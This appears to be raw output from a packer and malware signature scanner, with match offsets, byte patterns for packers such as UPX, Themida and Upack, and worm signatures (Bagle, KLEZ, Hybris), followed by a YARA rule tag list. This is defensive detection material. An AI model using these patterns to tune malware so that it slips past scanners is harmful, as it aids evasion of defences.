1 0x165a10 0x180d80 Silicon_Realms_Install_Stub_Detecton_1 Ujh@h@dPd%XSVWe@3Ҋԉ@ȁ @ʉ @ None $1
0 0x176361 Silicon_Realms_Install_Stub_Detecton_1 UjhP@hi@dPd%XSVWe@3Ҋԉ@ȁ @ʉ @ None $1
0 0x180d80 Silicon_Realms_Install_Stub_Detecton_Number_2 Ujh@h@dPd%XSVWe@3Ҋԉ@ȁ @ʉ @@3VYuj Yu@@@uЍEP@EEtEj XPuVV@PEPE MPQYYËeu=@u None $1
0 0x164826 SimplePack_1_2_build_30_09_Method2_Detecton_1 MZRPEL   None $1
0 0x16d6d2 SimplePack_1_21_build_09_09_Method2_Detecton_1 MZRPEL   None $1
2 0x164826 0x16635b 0x16d6d2 SimplePack_1_X_Method2_Detecton_1 MZRPEL   None $1
0 0x16bdf0 SimplePack_1_X_Method2_Detecton_1 MZRPEL   None $1
2 0x15c440 0x16635b 0x172d25 SimplePack_V1_1X_Method2_Detecton_1 MZRPEL None $1
0 0x16635b SimplePack_V1_1X_Method2_Detecton_Number_2 MZRPEL   None $1
0 0x16635b SimplePack_V1_1X_Method2_Detecton_Number_3 MZRPEL   None $1
2 0x1639a2 0x16c342 0x18df46 SLVc0deProtector_0_60_Detecton_1 IiIOhIg1x None $1
1 0x166606 0x180772 SLVc0deProtector_1_1_Detecton_1 ]i_@@󍕃@+ƒBiiQ@X2 None $1
0 0x180772 SLVc0deProtector_v1_1_Detecton_Number_2 ]i_@@󍕃@+ƒBiiQ@X2Y޷$ zjGlZle9T=$Lct,c kycx0/+5E6 }$Q<4ZC$t0 None $1
1 0x17213f 0x181650 Soft_Defender_v1_12_Detecton_1 tu2gtu h9DYPt uYUVWSxy 4GI4314RG#hGYXtu None $1
0 0x167c81 SoftComp_1_x_Detecton_1 ,$:A],$1*A)$$*AX*A None $1
0 0x152e37 SPLayer_v0_08_Detecton_1 @jX Hf; None $1
0 0x160cd8 ST_Protector_V1_5_Detecton_1 KeRnEl32.dLlGetProcAddressLoadLibraryA None $1
0 0x18245f Sun_Icon_Graphics_format_Detecton_1 /* Format_version=1, None $1
1 0x161972 0x1736f0 SVK_Protector_1_32_Eng_Detecton_1 `]6Bd#DŽDŽugIVDF^UQjV aY]@u<> None $1
1 0x158dcd 0x16d11f SVK_Protector_1_3x_Eng_Detecton_1 `]Bd#DŽDŽugIVDF^UQjV aY]@u<> None $1
1 0x161972 0x1736f0 SVK_Protector_1_3x_Eng_Detecton_1 `]6Bd#DŽDŽugIVDF^UQjV aY]@u<> None $1
0 0x17c431 SVK_Protector_v1_43_Detecton_1 xNL<xNV{\P ` None $1
0 0x182b89 Symantec_WinFax_PRO_7_5_Coverpage_Detecton_1  None $1
0 0x1839c8 Symantec_WinFax_PRO_8_3_Coverpage_Quick_CoverPage_Detecton_1 CoverDatabase None $1
0 0x1839dc Symantec_WinFax_PRO_8_3_Coverpage_Detecton_1 l None $1
1 0x1621d4 0x184fc5 tElock_0_98_Detecton_Number_2 % None $1
0 0x162370 tElock_0_98_Detecton_Number_2 % >.&K6Vi None $1
1 0x16bcb5 0x16bd0a tElock_0_99_Special_Build_Detecton_1 ^ 0 None $1
2 0x17c66c 0x189fdb 0x19060b tElock_0_99_Detecton_2  None $1
0 0x173614 The_Norton_Antivirus_Information_file_Detecton_1 The Norton AntiVirus Information File None $1
1 0x160f9c 0x18ae62 TheHyper_s_protector_Detecton_1 U^ kernel32.dllF VirtualAllocS None $1
0 0x163ec2 Themida_1_0_x_x_1_8_x_x_no_compression_Detecton_Number_2 U`ZEE@E؁}؀tEECEaEU|`ZE]Dž||ÈA||uDž|u7TxЊKuGF|A|uaUuEEF>uu} E None $1
1 0x1560ce 0x181e04 Themida_1_2_0_1_Detecton_1 ŋ`]5 5 5 5 5 t  D$$5 jEhth% None $1
0 0x181e04 Themida_1_2_0_1_Detecton_Number_2 ŋ`]5 5 5 5 5 t  D$$5 jEhth%K  None $1
0 0x155199 Themida_WinLicense_V1_X_NoCompression_SecureEngine_Detecton_1 ŋ`]t  D$$jEhth%K None $1
1 0x1699bb 0x169a10 Thinstall_2_403_Detecton_1 j P@L$)@ IH@D$A )@AA None $1
0 0x152fdd TPPpack_Detecton_1 ]@`3 None $1
0 0x1724be TPPpack_Detecton_1 ]@`3 None $1
1 0x16a0df 0x192040 Trainer_Creation_Kit_5_Trainer_Detecton_1 jhjjjh@h%E@<Pjh@E@hh0@PTXPj.pE@h%E@+0E@ None $1
0 0x192040 Trainer_Creation_Kit_v5_Trainer_Detecton_1 jhjjjh@h%E@<Pjh@E@hh0@PTXPj.pE@h%E@+0E@h4E@Pj50E@PjMtE@jh@jj5pE@ t5tE@'t t50E@t th%E@tjUVQWE =j5pE@Pjh None $1
0 0x178fbb Trilobyte_s_JPEG_graphics_Library_Detecton_1   None $1
0 0x175537 TrueType_Font_file_Detecton_1 LTSH None $1
0 0x175527 TrueType_Font_file_Detecton_Number_2 OS/2 None $1
0 0x18713e Turbo_Pascal_Configuration_File_Detecton_1 Turbo Pascal Configuration None $1
0 0x17b99e Turbo_Pascal_Desktop_File_Detecton_1 Turbo Pascal Desktop None $1
0 0x17e4df Turbo_Pascal_Help_File_Detecton_1 TURPASHELP None $1
0 0x185e9d Turbo_Profiler_Areas_file_Detecton_1 TurboProfilerareasfile None $1
0 0x1623e8 Unnamed_Scrambler_1_0_Detecton_Number_2 USV3E@0k@3UhB@d0d B@ظ(k@7,k@+(k@ЋËBB@*ظ k@$k@ k@ЋËjjjj2(k@YUU$k@ k@jjjj2 None $1
0 0x15456d Unnamed_Scrambler_1_1C_Detecton_Number_2 USV3EEEGO\g3UhJd0d Jg_؋֋Ë g:FPиg[g ЍFNPFHиggЋƋNHv\vXvdv`gggvg\иgظg None $1
0 0x15f3a9 Unnamed_Scrambler_1_2B_Detecton_Number_2 USVW3E؉E܉EEEp:@3Uh\?@d0d \ e@3ɺhh e@jU@l?@U@ZU@ U@a@иTb@Tb@иU@ a@54b@50b@5<b@58b@U衈a@U None $1
0 0x16d9c3 Unnamed_Scrambler_1_2C_1_2D_Detecton_Number_2 UjjIuQSVW:3Uhd0d 3ɺhh j иTTи 54505<58U衈UT None $1
0 0x16cdb5 Unnamed_Scrambler_2_0_Detecton_Number_2 U jjIuSVW /@3Uh3@d0d 4@T@؅ujZT@Ë T@t k@ i@ET@E1W@EC`@j@j@{u ;и k@ k@oЋE jj jj, k@%UUk@ k@ None $1
0 0x156b0e Unnamed_Scrambler_2_1_Beta_2_1_1_Detecton_Number_2 UjjIuSVW:3UhCd0d Cd؅ujdË d3EdEEh{u ;иЋE None $1
0 0x165360 Unnamed_Scrambler_2_5A_Detecton_Number_2 U jjIuQSVWl>@3Uh`D@d0d pD@l@b؅ujd@Ë l@7l@ hl@l@d@l@;t3׋ ;l@l@$Ћǣ n@U3 E n@n@ None $1
1 0x159ae8 0x175c1d UPack_0_11_Detecton_1 H@33ɫHر PQXT\rZ,s<r,P_ [ g) None $1
1 0x15e255 0x15e26f Upack_0_22_0_23_beta_Detecton_Number_3 j@Y󥭵PQXT None $1
1 0x1547cb 0x18aaff Upack_0_28_0_399_relocated_image_base_Delphi_NET_DLL_or_something_else_Detecton_1 ` 3^+ޭ+حP^V n]} ^SPQXT\rW,s<r None $1
0 0x1798ec Upack_0_28_0_399_relocated_image_base_Delphi_NET_DLL_or_something_else_Detecton_1 ` 3^+ޭ+حP^V n]} ^SPQXT\rW,s<r None $1
1 0x154694 0x1546b2 Upack_0_36_beta_Detecton_1 6H KERNEL32.DLL None $1
1 0x16e87f 0x16e8d3 Upack_0_37_beta_Detecton_1 Pv4|H LoadLibraryA7 None $1
1 0x16061b 0x16066f Upack_0_38_beta_Detecton_1 Pv4|H LoadLibraryA8 None $1
1 0x16685c 0x1668b0 Upack_0_399_Detecton_1 Pv4|H LoadLibraryA: None $1
0 0x175c1d UPack_v0_11_Detecton_1 H@33ɫHر PQXT\rZ,s<r,P_ [ g)+V *3҄RƊЍZtt3ɵU3^ 0sP0r0r+< r P+F σ`Շ^s 0Շ^s^<r PS|U[w<r P^^^ UPH None $1
0 0x163a7a Upack_v0_29_Beta_v0_31_Beta_Detecton_1 󥭵 None $1
0 0x16591c Upack_v0_29_Beta_v0_31_Beta_Detecton_1 @󥭵 None $1
0 0x162d9c Upack_v0_32_Beta_Patch_Detecton_1 P None $1
0 0x15326e Upack_v0_32_Beta_Detecton_1 P None $1
0 0x15327b Upack_v0_32_Beta_Detecton_Number_2 P None $1
0 0x16a375 Upack_v0_35_alpha_Detecton_1 L T None $1
0 0x157869 Upack_v0_36_alpha_Detecton_1 ]YvhQYF None $1
2 0x159754 0x16074f 0x16e9b3 Upack_v0_37_v0_38_Beta_Strip_base_relocation_table_Option_Detecton_1 S3U@QVL3 None $1
4 0x1627cf 0x166988 0x1779b8 0x17bdda 0x188bcd Upack_v0_39_final_Detecton_Number_2 VS3U@Q None $1
6 0x1606f7 0x166819 0x166938 0x16e95b 0x177968 0x17bd8a 0x188b7d Upack_v0_39_final_Detecton_Number_3 v8P>j'Yv None $1
0 0x17602d Upack_Patch_Detecton_Number_2 *T None $1
0 0x17ea29 UPolyX_V0_1_Detecton_1 None $1
1 0x15c7e0 0x18ed4d UPolyX_v0_5_Detecton_1 $Y None $1
0 0x18478a UPolyX_v0_5_Detecton_1 $Y None $1
1 0x15c834 0x176f67 UPolyX_v0_5_Detecton_Number_2 F $3 None $1
0 0x176f67 UPolyX_v0_5_Detecton_Number_3 F $3 None $1
1 0x163d01 0x17ee52 UPX_Detecton_1 `Bp None $1
0 0x164f06 UPX_Detecton_1 `A None $1
0 0x166a10 UPX_Detecton_1 `Fp None $1
1 0x168079 0x168097 UPX_Detecton_1 `@ None $1
0 0x1680ec UPX_Detecton_1 `@ None $1
1 0x16897d 0x176547 UPX_Detecton_1 `B` None $1
0 0x16aa2f UPX_Detecton_1 `@ None $1
0 0x1727fa UPX_Detecton_1 `D` None $1
0 0x1836dc UPX_Detecton_1 `C None $1
0 0x18372c UPX_Detecton_1 `Cp None $1
0 0x19583f UPX_Detecton_1 `PC None $1
0 0x195bd5 UPX_Detecton_1 `@ None $1
1 0x163d01 0x17ee52 UPX_Detecton_Number_2 `Bp None $1
0 0x164f06 UPX_Detecton_Number_2 `A None $1
0 0x166a10 UPX_Detecton_Number_2 `Fp None $1
1 0x168079 0x168097 UPX_Detecton_Number_2 `@ None $1
0 0x1680ec UPX_Detecton_Number_2 `@ None $1
1 0x16897d 0x176547 UPX_Detecton_Number_2 `B` None $1
0 0x16aa2f UPX_Detecton_Number_2 `@ None $1
0 0x16e040 UPX_Detecton_Number_2 ` None $1
3 0x1710ab 0x17c6cc 0x17fca2 0x18d2da UPX_Detecton_Number_2 ` None $1
0 0x1727fa UPX_Detecton_Number_2 `D` None $1
0 0x175f5a UPX_Detecton_Number_2 ` None $1
0 0x180839 UPX_Detecton_Number_2 ` None $1
0 0x1836dc UPX_Detecton_Number_2 `C None $1
0 0x18372c UPX_Detecton_Number_2 `Cp None $1
0 0x184e98 UPX_Detecton_Number_2 `R None $1
0 0x18cfcf UPX_Detecton_Number_2 `+ None $1
0 0x18d026 UPX_Detecton_Number_2 `' None $1
0 0x191bc1 UPX_Detecton_Number_2 `P None $1
0 0x19583f UPX_Detecton_Number_2 `PC None $1
0 0x195bd5 UPX_Detecton_Number_2 `@ None $1
0 0x15f29b UPX_2_00_3_0X_Detecton_1 ^G,<w?u_f)ٍ t<_P None $1
0 0x15f29b UPX_2_00_3_0X_Detecton_Number_2 ^G,<w?u_f)ٍ t<_PGt܉WHU tPTjSWՍ `(XPTPSWXaD$j9u None $1
1 0x163506 0x1840d4 UPX_Inliner_1_0_Detecton_1 `]@-@+荵tՋ+Љ None $1
0 0x1840d4 UPX_Inliner_v1_0_Detecton_1 `]@-@+荵tՋ+Љ6`j@hhj[1@.@PS=a߃?u ;;t-3{WQRS VW[ZY_thj None $1
0 0x15ed4b UPX_Protector_v1_0x_2_Detecton_1 FGu  None $1
7 0x163756 0x168997 0x16e845 0x174a26 0x176561 0x1836f6 0x183746 0x1897c1 UPX_Protector_v1_0x_2_Detecton_1 FGu  None $1
0 0x1753a0 UPX_Protector_v1_0x_2_Detecton_1 FGu  None $1
0 0x167b41 UPX_V1_94_Detecton_1 ՀXPTPSWXaD$j9u None $1
1 0x1540b5 0x178d8b UPX_v2_0_Detecton_1 U tPTjSWՍ `(XPTPSWXaD$j9u None $1
0 0x178d8b UPX_v2_0_Detecton_Number_2 U tPTjSWՍ `(XPTPSWXaD$j9u None $1
0 0x158149 UPX_V2_00_V2_90_Detecton_1 Ս `XPTPSWXaD$j9u None $1
1 0x15f32e 0x178dba UPX_V2_00_V2_90_Detecton_1 Ս `(XPTPSWXaD$j9u None $1
0 0x162510 UPX_HiT_0_0_1_Detecton_1 a None $1
0 0x1555bd UPX_HiT_v0_0_1_Detecton_1 4 a None $1
0 0x190e9b UPX_HiT_v0_0_1_Detecton_1 C4 a None $1
0 0x173ab1 UPX_Scrambler_Detecton_1 fu None $1
1 0x159282 0x1592d7 UPXFreak_0_1_Borland_Delphi_Detecton_1 OEOEBV$ None $1
0 0x18e9d7 USSR_V0_31_Detecton_1 @.USSR@ None $1
1 0x1732e0 0x18e9d7 USSR_V0_31_Detecton_Number_2 @.USSR None $1
0 0x17b15e Utah_RLE_Graphics_format_Detecton_1 R  None $1
0 0x18dea1 VBOX_v4_3_v4_6_Detecton_1 ċċċċċċċċċċċċċċċ None $1
0 0x16e7e7 VBOX_v4_3_v4_6_Detecton_Number_2 ŋŋŋŋŋŋŋŋŋŋŋŋŋŋŋ None $1
0 0x16e803 VBOX_v4_3_v4_6_Detecton_Number_3 ŋŐ33+3ŋ+H @ None $1
0 0x18de7a VBOX_v4_3_v4_6_Detecton_Number_3 33+3ŋ+H @ None $1
0 0x17d761 Video_CD_file_Detecton_1 RIFFCDXAfmt None $1
1 0x16ccb3 0x18dbfb VIRUS_I_Worm_Bagle_Detecton_1 j=P@uhȯP@h\W@h0@5P@:=TW@th None $1
0 0x18dbfb VIRUS_I_Worm_Bagle_Detecton_Number_2 j=P@uhȯP@h\W@h0@5P@:=TW@th%@@%@@%@@%@@%@@%@@%@@%@@%$@@%(@@%,@@%0@@%4@@%8@@%<@@%@@@%D@@%H@@%L@@%P@@%T@@%X@@%\@@%`@@%@@%d@@%h@@ None $1
0 0x15545f VIRUS_I_Worm_Hybris_Detecton_1 TGABLKCGCRIShLp@ None $1
0 0x15be14 VIRUS_I_Worm_KLEZ_Detecton_1 Ujh@@h@dPd%XSVWe None $1
0 0x16afec VMProtect_0_7x_0_8_Detecton_1 [ VMProtect v 0.8 (C) PolyTech ] None $1
0 0x1737ef VMProtect_v1_25_Detecton_Number_829 EffEEfUf None $1
0 0x164f18 VMProtect_V1_X_Detecton_1 `ht$(4$ None $1
0 0x1555d2 VPacker_Detecton_1 EuPEPUSEPU؃ENuċ>uE@E܋U hjEPUU܋B<E܃؃EPj@hRUC` None $1
1 0x1584f6 0x158647 VProtector_Detecton_1 KERNEL32.dllUSER32.dllGDI32.dllGetProcAddressGetModuleHandleALo None $1
1 0x1584f6 0x158647 VProtector_Detecton_Number_3 KERNEL32.dllUSER32.dllGDI32.dllGetProcAddressGetModuleHandleALoadLibraryASleepGetVersionGetCommandLineAGetStartupInfoAGetACPCreateThreadDefWindowProcARegisterClassExACreateWindowExAGetSystemMetricsShowWindowGetDCReleaseDCFindWindowAGetMessageADestroyWindowSetPixel None $1
1 0x1584f6 0x158647 VProtector_Detecton_Number_4 KERNEL32.dllUSER32.dllGDI32.dllGetProcAddressGetModuleHandleALoadLibraryASleepGetVersionGetCommandLineAGetStartupInfoAGetACPCreateThreadDefWindowProcARegisterClassExACreateWindowExAGetSystemMetricsShowWindowGetDCReleaseDCFindWindowAGetMessageADestroyWindowSetPixel None $1
0 0x15879c VProtector_Detecton_Number_5 User32.dllGdi32.dllKernel32.dllDefWindowProcARegisterClassExACreateWindowExAGetSystemMetricsShowWindowGetDCReleaseDCFindWindowAGetMessageA None $1
0 0x15b876 VProtector_0_X_1_2X_Detecton_1 VirtualAllocvcasm_protect_3d$dXǃd5d% 1 3 YtuQX %Iuǃ X P None $1
0 0x16f865 VProtector_1_1A_1_2_Detecton_1 VirtualAllocvcasm_protect_2005_3_183d$dXǃd5d% 1 3 YtuQX %Iuǃ X P None $1
1 0x15f618 0x1627e6 vprotector_1_2_Detecton_Number_2 [VProtect]$D$=ud$X dtu$d5tu $d% None $1
0 0x15ee18 VProtector_1_3X_Detecton_1 kernel32.dllGetProcAddressGetModuleHandleALoadLibraryA`$$$(€3ۤ3-37A} None $1
0 0x15879c VProtector_V1_3X_Detecton_1 User32.dllGdi32.dllKernel32.dll None $1
0 0x17e3ea Watcom_C_C_Detecton_1 @WATCOM C/C++32 Run-Time system. (c) Copyright by WATCOM International Corp. None $1
0 0x16b036 Werus_Crypter_1_0_Detecton_Number_2 h@jPj %@%@%@%@%@%@%@%@%@%@ None $1
0 0x16b036 Werus_Crypter_1_0_Detecton_Number_3 h@jPj %@%@%@%@%@%@%@%@%@%@%@%@@3} None $1
0 0x190774 Windows_Animation_format_Detecton_1 RIFFACONLIST None $1
0 0x180762 Windows_Type_1_font_metric_file_Detecton_1 Copyright None $1
1 0x15aae9 0x18509c WinKript_1_0_Detecton_1 3t3P 949A;rXa None $1
5 0x15520f 0x155223 0x15fa48 0x15fca0 0x15fda6 0x16cd08 WinUpack_v0_30_beta_Detecton_1 ByDwing@PE None $1
4 0x155223 0x15fa48 0x15fca0 0x15fda6 0x16cd08 WinUpack_v0_30_beta_Detecton_Number_2 ByDwing@PEL None $1
3 0x15f355 0x1778e0 0x17bd02 0x188af5 WinUpack_v0_39_final_Detecton_Number_4 Pv4|H LoadLibraryA9 None $1
1 0x166e7f 0x189b76 Wise_Installer_Stub_1_10_1029_1_Detecton_1 U@SVWj0@t0@E"uHH@E3t"t H@E8"u@E8 u @8 tE None $1
1 0x1533a4 0x18b818 Wise_Installer_Stub_Detecton_Number_3 USVWj^ju@@@@}<"GG}3:t <"t GG}?"uG}? None $1
0 0x1750ac Wise_Installer_Stub_Detecton_Number_3 U,SVWj^juT@@P@@}<"GG}3:t <"t GG}?"uG}? None $1
0 0x18b818 Wise_Installer_Stub_Detecton_Number_4 USVWj^ju@@@@}<"GG}3:t <"t GG}?"uG}? u G? t}S@@?/EuG<St<su5 None $1
0 0x1651d6 X_Hider_1_0_Detecton_Number_2 t#JAPRB0XRHHZXBtJI| JuB\Í@~$P P/ZfDZP@1Ð None $1
0 0x158908 X_Pack_v1_4_2_Detecton_1 rËރÎ؋߃Î None $1
0 0x1722e6 XCF_File_Format_Detecton_1 FrameLen None $1
0 0x14ad80 XM_music_file_Detecton_1 Extended Module: None $1
0 0x179b51 XMI_music_file_Detecton_1 FORMXMID None $1
2 0x15df84 0x187794 0x19352f Xtreme_Protector_1_06_Detecton_1 uPQJ`t$$|$(FGuFsuFsO3uF None $1
0 0x17f88e XWD_graphics_format_Detecton_1 q None $1
1 0x15e9a9 0x191b12 yC_1_3_Detecton_1 USVW@0`]RAu^ARAՁRA:3¬ None $1
1 0x1568fd 0x187176 yoda_s_Protector_1_01_Detecton_1 USVWy-` None $1
8 0x1603d6 0x1646d6 0x16e218 0x1761f5 0x1814cc 0x1872b9 0x18743d 0x18f583 0x1930aa yoda_s_Protector_1_02_exe_scr_com_Detecton_1 UUu None $1
2 0x153b7e 0x17adbf 0x191124 yoda_s_Protector_1_0b_Detecton_1 USVW`]L2@G@2@Ձ2@:3 None $1
1 0x16262b 0x18fd6f yoda_s_Protector_1_0b_Detecton_1 USVW`]L2@G@2@Ձ2@:3 None $1
4 0x153b7e 0x16262b 0x17adbf 0x18fd6f 0x191124 yoda_s_Protector_1_0b_Detecton_Number_2 USVW`]L2@ None $1
1 0x1646d6 0x1814cc yoda_s_Protector_v1_03_2_Detecton_1 UUu.`]sBՁsBR None $1
1 0x16262b 0x18fd6f yP_1_0b_Detecton_1 USVW`]L2@G@2@Ձ2@:3 None $1
1 0x15630f 0x184cf1 ZipWorxSecureEXE_2_5_Detecton_1 SecureEXE Executable File Protector Copyright(c) 20 None $1

YARA:TAGS:LIST

namespace rule meta
packers_index possible_includes_base64_packed_functions impact: 5 hide: True desc: Detects possible includes and packed functions
packers_index silent_banker author: malware-lu
packers_index zbot author: malware-lu
packers_index Borland author: malware-lu
packers_index EnigmaProtector1XSukhovVladimirSergeNMarkin author: malware-lu
packers_index SPLayerv008 author: malware-lu
packers_index eXPressorv13CGSoftLabs author: malware-lu
packers_index Upackv032BetaDwing author: malware-lu
packers_index WiseInstallerStub author: malware-lu
packers_index AnskyaNTPackerGeneratorAnskya author: malware-lu
packers_index NsPack14byNorthStarLiuXingPing author: malware-lu
packers_index EmbedPEV100V124cyclotron author: malware-lu
packers_index SetupFactoryv6003SetupLauncher author: malware-lu
packers_index IMPPacker10MahdiHezavehiIMPOSTER author: malware-lu
packers_index PEProtectv09 author: malware-lu
packers_index UPXv20MarkusLaszloReiser author: malware-lu
packers_index PECompactv200alpha38 author: malware-lu
packers_index FreeCryptor01build001GlOFF author: malware-lu
packers_index UnnamedScrambler11Cp0ke author: malware-lu
packers_index PAVCryptorPawningAntiVirusCryptormasha_dev author: malware-lu
packers_index EncryptPEV22006115WFS author: malware-lu
packers_index PrincessSandyv10eMiNENCEProcessPatcherPatch author: malware-lu
packers_index ocBat2Exe10OC author: malware-lu
packers_index ASDPack20asd author: malware-lu
packers_index EXECryptor2021protectedIAT author: malware-lu
packers_index ThemidaWinLicenseV1XNoCompressionSecureEngineOreansTechnologies author: malware-lu
packers_index WinUpackv030betaByDwing author: malware-lu
packers_index ExeSafeguardv10simonzh author: malware-lu
packers_index PrivateEXEProtector20SetiSoft author: malware-lu
packers_index NTkrnlSecureSuite01015DLLNTkrnlSoftware author: malware-lu
packers_index UPXHiTv001DJSiba author: malware-lu
packers_index Vpackerttui author: malware-lu
packers_index eXPressorv12CGSoftLabs author: malware-lu
packers_index Enigmaprotector110111VladimirSukhov author: malware-lu
packers_index Obsidium1336ObsidiumSoftware author: malware-lu
packers_index MarjinZEXEScramblerSEbyMarjinZ author: malware-lu
packers_index Packman0001Bubbasoft author: malware-lu
packers_index aPackv098bDSESnotsaved author: malware-lu
packers_index ASProtectvIfyouknowthisversionpostonPEiDboardh2 author: malware-lu
packers_index AntiDote12DLLDemoSISTeam author: malware-lu
packers_index Themida1201OreansTechnologies author: malware-lu
packers_index ASProtectSKE21xexeAlexeySolodovnikov author: malware-lu
packers_index EXECryptorV21Xsoftcompletecom author: malware-lu
packers_index RCryptorv11Vaska author: malware-lu
packers_index nSpackV2xLiuXingPing author: malware-lu
packers_index MetrowerksCodeWarriorv20GUI author: malware-lu
packers_index UnnamedScrambler21Beta211p0ke author: malware-lu
packers_index NoodleCryptv20 author: malware-lu
packers_index BlindSpot10s134k author: malware-lu
packers_index DropperCreatorV01Conflict author: malware-lu
packers_index dUP2xPatcherwwwdiablo2oo2cjbnet author: malware-lu
packers_index EXECryptor2223compressedcodewwwstrongbitcom author: malware-lu
packers_index PolyCryptPE214b215JLabSoftwareCreationshoep author: malware-lu
packers_index MetrowerksCodeWarriorv20Console author: malware-lu
packers_index Upackv036alphaDwing author: malware-lu
packers_index NETDLLMicrosoft author: malware-lu
packers_index CelsiusCrypt21Z3r0 author: malware-lu
packers_index CreateInstallv200335 author: malware-lu
packers_index UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser author: malware-lu
packers_index Petite21 author: malware-lu
packers_index VProtectorvcasm author: malware-lu
packers_index XPackv142 author: malware-lu
packers_index ExeSplitter13SplitCryptMethodBillPrisonerTPOC author: malware-lu
packers_index EXECryptor224StrongbitSoftCompleteDevelopmenth3 author: malware-lu
packers_index ASProtectv12AlexeySolodovnikovh1 author: malware-lu
packers_index LY_WGKXwwwszleyucom author: malware-lu
packers_index Enigmaprotector110unregistered author: malware-lu
packers_index Upackv037v038BetaStripbaserelocationtableOptionDwing author: malware-lu
packers_index NTkrnlSecureSuiteNTkrnlteam author: malware-lu
packers_index AaseCrypterbysantasdad author: malware-lu
packers_index aPackv098bJibz author: malware-lu
packers_index UPackv011Dwing author: malware-lu
packers_index NsPacKNetLiuXingPing author: malware-lu
packers_index RLPv073betaap0x author: malware-lu
packers_index MetrowerksCodeWarriorDLLv20 author: malware-lu
packers_index PESpinv04x author: malware-lu
packers_index D1NS1GD1N author: malware-lu
packers_index MoleBoxv230Teggo author: malware-lu
packers_index Petite14 author: malware-lu
packers_index Petite13 author: malware-lu
packers_index RosAsm2050aBetov author: malware-lu
packers_index ACProtect14xRISCOsoft author: malware-lu
packers_index PEZipv10byBaGIE author: malware-lu
packers_index NsPackV2XLiuXingPing author: malware-lu
packers_index KBysPacker028BetaShoooo author: malware-lu
packers_index AntiDote12DemoSISTeam author: malware-lu
packers_index VProtector0X12Xvcasm author: malware-lu
packers_index VIRUSIWormKLEZ author: malware-lu
packers_index OpenSourceCodeCrypterp0ke author: malware-lu
packers_index QrYPt0rbyNuTraL author: malware-lu
packers_index EXECryptor2xxmaxcompressedresources author: malware-lu
packers_index MSLRHv032aemadicius author: malware-lu
packers_index EXECryptor2xxcompressedresources author: malware-lu
packers_index PolyBoxCAnskya author: malware-lu
packers_index UPolyXv05 author: malware-lu
packers_index PrivatePersonalPackerPPP102ConquestOfTroycom author: malware-lu
packers_index ENIGMAProtectorSukhovVladimir author: malware-lu
packers_index PuNkMoD1xPuNkDuDe author: malware-lu
packers_index InnoSetupModulev2018 author: malware-lu
packers_index AntiDote10Demo12SISTeam author: malware-lu
packers_index nSpackV23LiuXingPing author: malware-lu
packers_index NsPackv23NorthStar author: malware-lu
packers_index NTkrnlSecureSuite01015NTkrnlSoftware author: malware-lu
packers_index CrunchPEv40 author: malware-lu
packers_index hmimysProtectv10 author: malware-lu
packers_index PEPaCKv10CCopyright1998byANAKiN author: malware-lu
packers_index Upack022023betaDwing author: malware-lu
packers_index kkrunchyv017FGiesen author: malware-lu
packers_index ACProtectUltraProtect10X20XRiSco author: malware-lu
packers_index RLPV073betaap0x author: malware-lu
packers_index yCv13byAshkbizDanehkar author: malware-lu
packers_index PerlApp602ActiveState author: malware-lu
packers_index UPXProtectorv10x2 author: malware-lu
packers_index CodeVirtualizer1310OreansTechnologies author: malware-lu
packers_index VProtector13Xvcasm author: malware-lu
packers_index PEQuake006forgat author: malware-lu
packers_index D1S1Gv11BetaScrambledEXED1N author: malware-lu
packers_index UPX20030XMarkusOberhumerLaszloMolnarJohnReiser author: malware-lu
packers_index UnnamedScrambler12Bp0ke author: malware-lu
packers_index LauncherGeneratorv103 author: malware-lu
packers_index NakedPacker10byBigBoote author: malware-lu
packers_index ActiveMARK5xTrymediaSystemsInc author: malware-lu
packers_index AsCryptv01SToRM2 author: malware-lu
packers_index AsCryptv01SToRM3 author: malware-lu
packers_index AsCryptv01SToRM4 author: malware-lu
packers_index PackItBitch10archphase author: malware-lu
packers_index SafeDiscv4 author: malware-lu
packers_index EXECryptorv153 author: malware-lu
packers_index Crunch5Fusion4 author: malware-lu
packers_index NorthStarPEShrinkerv13byLiuxingping author: malware-lu
packers_index Armadillo430aSiliconRealmsToolworks author: malware-lu
packers_index STProtectorV15SilentSoftware author: malware-lu
packers_index ANDpakk2006DmitryAndreev author: malware-lu
packers_index NETexecutableMicrosoft author: malware-lu
packers_index AZProtect0001byAlexZakaAZCRC author: malware-lu
packers_index ExeSplitter12BillPrisonerTPOC author: malware-lu
packers_index Morphinev27Holy_FatherRatter29A author: malware-lu
packers_index EnigmaProtector11X13XSukhovVladimirSergeNMarkin author: malware-lu
packers_index AsCryptv01SToRM1 author: malware-lu
packers_index MaskPE16yzkzero author: malware-lu
packers_index ASProtectv20 author: malware-lu
packers_index UnnamedScrambler10p0ke author: malware-lu
packers_index UPXHiT001DJSiba author: malware-lu
packers_index yPv10bbyAshkbizDanehkar author: malware-lu
packers_index MSLRHv031a author: malware-lu
packers_index Upackv039finalDwing author: malware-lu
packers_index FakeNinjav28Spirit author: malware-lu
packers_index DragonArmorOrient author: malware-lu
packers_index Upackv032BetaPatchDwing author: malware-lu
packers_index Apex30alpha500mhz author: malware-lu
packers_index ExeSplitter13SplitMethodBillPrisonerTPOC author: malware-lu
packers_index RJoiner12aVaska author: malware-lu
packers_index UPXInlinerv10byGPcH author: malware-lu
packers_index SLVc0deProtector060SLVICU author: malware-lu
packers_index Upackv029Betav031BetaDwing author: malware-lu
packers_index AlexProtector10beta2byAlex author: malware-lu
packers_index MoleBoxv254Teggo author: malware-lu
packers_index Themida10xx18xxnocompressionOreansTechnologies author: malware-lu
packers_index PolyBoxDAnskya author: malware-lu
packers_index nBinderv40 author: malware-lu
packers_index SimplePack12build3009Method2bagie author: malware-lu
packers_index RSCsProcessPatcherv151 author: malware-lu
packers_index VMProtect106107PolyTech author: malware-lu
packers_index USSR031bySpirit author: malware-lu
packers_index ASProtectv123RC4build0807exeAlexeySolodovnikov author: malware-lu
packers_index eXPressorProtection150XCGSoftLabs author: malware-lu
packers_index XHider10GlobaL author: malware-lu
packers_index UnnamedScrambler25Ap0ke author: malware-lu
packers_index InnoSetupModule author: malware-lu
packers_index FreeCryptor01build002GlOFF author: malware-lu
packers_index NTPackerV2XErazerZ author: malware-lu
packers_index SiliconRealmsInstallStub author: malware-lu
packers_index MoleBoxv20 author: malware-lu
packers_index AI1Creator1Beta2byMZ author: malware-lu
packers_index Setup2GoInstallerStub author: malware-lu
packers_index mkfpackllydd author: malware-lu
packers_index PrivateexeProtectorV18SetiSoftTeam author: malware-lu
packers_index DotFixNiceProtect21GPcHSoft author: malware-lu
packers_index SimplePackV11XMethod2bagie author: malware-lu
